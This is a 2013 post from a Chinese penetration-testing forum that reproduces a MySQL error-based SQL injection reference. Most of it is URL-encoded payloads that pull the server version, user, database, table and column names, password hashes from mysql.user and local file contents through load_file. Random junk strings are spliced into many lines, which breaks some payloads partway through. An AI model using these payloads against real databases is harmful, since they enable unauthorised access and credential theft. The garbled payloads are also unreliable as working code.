中国网络渗透测试联盟

标题: Mysql暴错注入参考(pdf) [打印本页]

作者: admin    时间: 2013-7-27 11:00
标题: Mysql暴错注入参考(pdf)
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑 ' ~6 p1 M- q, g* b
; n  a, ^+ {! Q3 j0 w  E7 c

% q3 L0 a4 H6 `- w. s7 K  {Mysql暴错注入参考(pdf),每天一贴。。。% P5 i+ w7 h* b6 @- I. ^

: [/ d1 E, P3 S9 n3 \$ M' l* M; F# oMySql Error Based Injection Reference4 A2 L! i4 J& a0 g  e
[Mysql暴错注入参考]# \. [' B6 u# k. y$ ]( @
Authornig0s1992% ^6 S1 k! {( X' K: T5 @
Blog:http://pnig0s1992.blog.51cto.com/
6 _- M. w8 ^7 z. e( }TeAm:http://www.FreeBuf.com/8 N5 }, x4 i7 A9 }( z  X  a
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功, o5 i5 X6 n( W) I; k# r
小部分版本使用name_const()时会报错.可以用给出的Method.2测试) q2 d/ X5 @3 Y5 h1 ?( z2 h3 V: z
查询版本:
; X9 X. m- V% \" v/ TMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
! F( O2 y! n; Y& [! q" P) ]join+(select+name_const(@@version,0))b)c)! v6 K; K, }$ c- W% h3 Y+ \9 r
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro' _2 ~3 O& b: L% ]) I$ q
up by a)b)8 i! P. x" H, w( r4 x# D7 n
查询当前用户:- I2 f; S0 Z6 b
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
% f# p: F8 A0 w, O; h1 P2 PMethod.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r. k2 ]- d, I' S# p# A
and(0)*2))x+from+information_schema.tables+group+by+x)a)
  v$ l0 g4 ~6 k% q7 L  |7 Q查询当前数据库:4 `- {7 _4 n1 Y' v- T) b- F' e# y
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
7 S8 m, u6 G2 k/ r" I/ B& k6 FMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
  |* C1 s$ b7 q' q8 Yor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)1 ~2 {6 ]. R; Z( W, P
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
/ b4 k7 b# S7 l$ L2 g0 i2 I& TLIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
- T/ t8 ^" k6 F' a: p2 s! x0 V顺序替换
' ~# @7 p, t) E+ E. {$ t爆指定库数目:" V& S/ F2 e0 `' ]. G9 o* i/ u
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
/ `( }- R! K& X2 S$ J) k: t/ E) o# Table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
3 b9 y3 L( d! a# V4 x" }' ?9 m+by+x)a)+and+1=1 0x6D7973716C=mysql( B! b& U1 I! F# Z- S" s( e1 }1 r9 }
依次爆表:
3 b7 h/ T" y/ g# ]+ F8 }and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t! y# B( n% a( Q( Q- F  ^3 C! m  n
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
5 W. W- p) b( v/ rbles+group+by+x)a)+and+1=15 T8 N; ?5 e- V. T- b$ s
0x6D7973716C=Mysql 将n顺序替换/ I% P# @" c. e4 \% U  i" ~8 X
爆表内字段数目:
# L. v' R4 P$ K/ o$ n+ ?; [- d, fand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE4 {2 }% ]5 S  H  w' r2 }
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran3 N0 _3 e. s4 o: E8 e8 Q# ~% `
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1$ t' h/ {4 a% A0 p* z
依次爆字段:
  F! f7 q1 C+ Gand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
5 G. ~: C* i" W7 P+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
$ {% c! u5 c$ N6 t4 zloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换7 d: Q$ @& ~9 R/ N% c
依次暴内容:
  U9 @% X4 a( o1 j4 w* R" band+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche6 I1 h$ ^) t! F. @  W9 L
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
- F" ]5 Q  i3 J3 L, I* ]( J将n顺序替换
2 Z( k( h; T5 t爆文件内容:7 ~1 ~, J4 g9 r8 F& @% G4 U) J
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a; M* j' g5 ?: Z" L! ]
from+information_schema.tables+group+by+a)b) 0 B0 t) T9 v) I$ L5 o
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节) G6 B* i/ A6 E2 b* C* L3 b* ?. m
Thx for reading.+ r6 G: H- M% Q9 a1 }
  @% _- O" K7 c* p4 G  ?
不要下载也可以, . R; _9 {( c+ R) z& T% D: b$ h  }5 y





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2